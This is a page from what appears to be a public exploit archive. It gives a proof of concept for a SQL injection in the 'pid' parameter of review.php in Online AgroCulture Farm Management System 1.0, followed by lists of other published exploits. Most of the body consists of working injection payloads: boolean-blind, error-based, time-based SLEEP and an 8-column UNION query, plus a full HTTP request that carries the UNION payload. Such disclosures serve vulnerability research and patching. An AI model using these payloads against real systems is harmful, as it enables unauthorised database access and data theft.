Menu

Search for hundreds of thousands of exploits

"Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection"

Author

Exploit author

BKpatron

Platform

Exploit platform

php

Release date

Exploit published date

2020-05-07

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
# Exploit Title: Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection
# Google Dork: N/A
# Date: 2020-05-07
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/14198/online-agroculture-farm-management-system-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14198&title=Online+AgroCulture+Farm+Management+System+in+PHP%2FMySQL
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# my website: bkpatron.com

# Discription:
The Online AgroCulture Farm Management System v1.0 application is vulnerable to
SQL injection via the 'pid' parameter on the review.php page.
# vulnerable file : review.php
http://localhost/AgroCulture/review.php?pid=27

Parameter: pid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=27' AND 5853=5853 AND 'EmvW'='EmvW

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: pid=27' AND (SELECT 9739 FROM(SELECT COUNT(*),CONCAT(0x7170627071,(SELECT (ELT(9739=9739,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tpnl'='tpnl

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: pid=27' AND (SELECT 7650 FROM (SELECT(SLEEP(5)))bwDl) AND 'IWff'='IWff

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: pid=-6157' UNION ALL SELECT NULL,NULL,CONCAT(0x7170627071,0x6d7a6346644349635a495a424c56644c51666866664553794e674764546a6c67747a69634749516a,0x7176626a71),NULL,NULL,NULL,NULL,NULL-- RXWN
[INFO] the back-end DBMS is MySQL
web application technology: PHP, Apache 2.4.39, PHP 7.2.18
back-end DBMS: MySQL >= 5.0


# Proof of Concept:
http://localhost/vulnerability/ncn/AgroCulture/review.php?pid=sqli

GET AgroCulture/review.php?pid=27 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie:PHPSESSID=gd27cb23t7m8o57giuvh0f8e7m
Connection: keep-alive
Upgrade-Insecure-Requests: 1
pid=-6157%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7170627071,0x6d7a6346644349635a495a424c56644c51666866664553794e674764546a6c67747a69634749516a,0x7176626a71),NULL,NULL,NULL,NULL,NULL--%20RXWN
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-10-15 "Vehicle Parking Management System 1.0 - Authentication Bypass" webapps php BKpatron
2020-09-03 "BloodX CMS 1.0 - Authentication Bypass" webapps php BKpatron
2020-07-26 "elaniin CMS - Authentication Bypass" webapps php BKpatron
2020-07-10 "Barangay Management System 1.0 - Authentication Bypass" webapps php BKpatron
2020-06-23 "Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)" webapps php BKpatron
2020-06-22 "Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload" webapps php BKpatron
2020-06-05 "Online Course Registration 1.0 - Authentication Bypass" webapps php BKpatron
2020-06-04 "Clinic Management System 1.0 - Authenticated Arbitrary File Upload" webapps php BKpatron
2020-06-04 "Clinic Management System 1.0 - Unauthenticated Remote Code Execution" webapps php BKpatron
2020-06-02 "Clinic Management System 1.0 - Authentication Bypass" webapps php BKpatron
2020-05-18 "Online Healthcare management system 1.0 - Authentication Bypass" webapps php BKpatron
2020-05-18 "online Chatting System 1.0 - 'id' SQL Injection" webapps php BKpatron
2020-05-18 "Online Examination System 1.0 - 'eid' SQL Injection" webapps php BKpatron
2020-05-11 "Victor CMS 1.0 - 'post' SQL Injection" webapps php BKpatron
2020-05-11 "Complaint Management System 1.0 - Authentication Bypass" webapps php BKpatron
2020-05-07 "Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection" webapps php BKpatron
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.